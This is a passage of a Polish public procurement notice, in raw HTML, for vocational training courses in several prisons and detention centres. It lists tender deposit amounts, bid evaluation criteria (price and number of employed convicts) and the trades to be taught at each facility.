- zadanie 2 w wysokości 1 000,00 zł (słownie: jeden tysiąc 00/100 złotych),
- zadanie 3 w wysokości 1 500,00 zł (słownie: jeden tysiąc pięćset 00/100 złotych),
- zadanie 4 w wysokości 3 000,00 zł (słownie: trzy tysiące 00/100 złotych),
- zadanie 5 w wysokości 3 000,00 zł (słownie: trzy tysiące 00/100 złotych),
- zadanie 6 w wysokości 3 000,00 zł (słownie: trzy tysiące 00/100 złotych),
- zadanie 7 w wysokości 3 500,00 zł (słownie: trzy tysiące pięćset 00/100 złotych),
- zadanie 8 w wysokości 3 000,00 zł (słownie: trzy tysiące 00/100 złotych),
- zadanie 9 w wysokości 3 000,00 zł (słownie: trzy tysiące 00/100 złotych),
- zadanie 10 w wysokości 3 000,00 zł (słownie: trzy tysiące 00/100 złotych),
- zadanie 11 w wysokości 3 000,00 zł (słownie: trzy tysiące 00/100 złotych),
Wykonawca składający ofertę na wszystkie zadania wnosi wadium w wysokości sumy poszczególnych zadań tj. 30 000,00 (słownie: trzydzieści tysięcy 00/100 złotych). Wykonawca składający ofertę na mniejszą liczbę zadań wnosi wadium w wysokości sumy wadiów określonych dla zadań na które składa ofertę. 
2.	Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone w jednej lub kilku następujących formach: pieniądzu; poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt.2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 60 1010 1270 0045 0313 9120 0000 oraz opisać w następujący sposób: Wadium do postępowania nr OI.POWER.2230.2.2017 KR  za zadania nr (należy wpisać wszystkie numery zadań na które złożona będzie oferta).
5. Wniesienie wadium w formie pieniężnej będzie skuteczne, jeżeli przed upływem terminu składania ofert znajdzie się na rachunku bankowym Zamawiającego. 
6. Wadium wnoszone w formie poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej, poręczenia, o którym mowa w art. 45 ust.6 pkt. 5 ustawy Pzp, należy złożyć w formie oryginału. Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art.46 ust.4a oraz art.46 ust.5 ustawy Pzp.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Ilość zatrudninych skazanych</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/04/2017, godzina: 10:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 60 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Przeprowadzenie 7 szkoleń w Areszcie Śledczym w Kielcach<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Technolog robót wykończeniowych w budownictwie
Ogrodnik terenów zieleni
Brukarz
Technolog robót wykończeniowych w budownictwie
Ogrodnik terenów zieleni
Technolog robót wykończeniowych w budownictwie
Technolog robót wykończeniowych w budownictwie
Grupy szkoleniowe składają się z 12 osób. Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych w jednostce.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8, 80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Liczba zatrudnionych skazanych</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Przeprowadzenie 3 szkoleń w Areszcie Śledczym w Krakowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Brukarz
Brukarz
Technolog robót wykończeniowych w budownictwie
Grupy szkoleniowe składają się z 12 osób. Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych w jednostce.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8, 80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Liczba zatrudnionych skazanych</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Przeprowadzenie 4 szkoleń w Areszcie Śledczym w Krakowie Podgórzu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Ogrodnik terenów zieleni
Brukarz
Brukarz
Technolog robót wykończeniowych w budownictwie
Grupy szkoleniowe składają się z 10 osób. Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych w jednostce.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8, 80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Liczba zatrudnionych skazanych</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Przeprowadzenie 7 szkoleń w Zakładzie Karnym w Krakowie-Nowej Hucie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Krawiec
Asystent osoby niepełnosprawnej /opiekun osoby starszej
Technolog robót wykończeniowych w budownictwie
Brukarz
Technolog robót wykończeniowych w budownictwie
Brukarz
Technolog robót wykończeniowych w budownictwie
Grupy szkoleniowe składają się z 12 osób. Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych w jednostce.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-1, 80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Liczba zatrudnionych skazanych</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Przeprowadzenie 7 szkoleń w Zakładzie Karnym w Nowym Sączu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Technolog robót wykończeniowych w budownictwie
Technolog robót wykończeniowych w budownictwie
Brukarz
Brukarz
Technolog robót wykończeniowych w budownictwie
Spawacz MIG/MAG
Spawacz MIG/MAG
Grupy szkoleniowe składają się z 10 osób. Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych w jednostce.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8, 80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Liczba zatrudnionch skazanych</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Przeprowadzenie 7 szkoleń w Zakładzie Karnym w Nowym Wiśniczu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Technolog robót wykończeniowych w budownictwie
Ogrodnik terenów zieleni
Brukarz
Tynkarz
Ogrodnik terenów zieleni
Brukarz
Brukarz
Grupy szkoleniowe składają się z 12 osób. Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych w jednostce.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8, 80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>liczba zatrudnionych skazanych</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Przeprowadzenie 8 szkoleń w Zakładzie Karnym w Pińczowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Asystent osoby niepełnosprawnej /opiekun osoby starszej
Technolog robót wykończeniowych w budownictwie
Brukarz
Monter stolarki budowlanej
Monter stolarki budowlanej
Brukarz
Kucharz
Malarz budowlany
Grupy szkoleniowe składają się z 12 osób. Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych w jednostce.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8, 80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>liczba zatrudnionych skazanych</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Przeprowadzenie 7  szkoleń w Zakładzie Karnym w Tarnowie<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Technolog robót wykończeniowych w budownictwie
Elektryk z uprawnieniami do eksploatacji urządzeń, instalacji i sieci energetycznych o napięciu do 1 kV
Brukarz
Brukarz
Ślusarz
Pilarz
Technolog robót wykończeniowych w budownictwie
Grupy szkoleniowe składają się z 12 osób. Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych w jednostce.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8, 80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>liczba zatrudnionych skazanch</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Przeprowadzenie 7 szkoleń w Zakładzie Karnym Tarnów - Mościce<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Stolarz
Brukarz
Monter izolacji budowlanych
Brukarz
Monter izolacji budowlanych
Brukarz
Technolog robót wykończeniowych w budownictwie
Grupy szkoleniowe składają się z 12 osób. Czas trwania każdego cyklu szkoleniowego (kursu) winien wynosić przeciętnie od 180 do 210 godzin dydaktycznych.  Określenie innego czasu trwania kursu wymaga pisemnej zgody Zamawiającego. Cykl szkoleniowy winien zostać zrealizowany w okresie do 40 dni od dnia jego rozpoczęcia. Zajęcia powinny odbywać się od poniedziałku do piątku w godzinach od 8.00 do 16.30 (zróżnicowane w zależności od jednostki). W sytuacjach wyjątkowych, za zgodą Dyrektora jednostki penitencjarnej, zajęcia mogą odbywać się również w soboty.   
Miejsce przeprowadzenia zajęć   pomieszczenia lekcyjne  i teren do zajęć praktycznych w jednostce.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8, 80562000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 08/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>liczba zatrudnionych skazanych</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>Przeprowadzenie 7 szkoleń w Zakładzie Karnym w Trzebini<br /><div style="padding-left: 20px"><b>
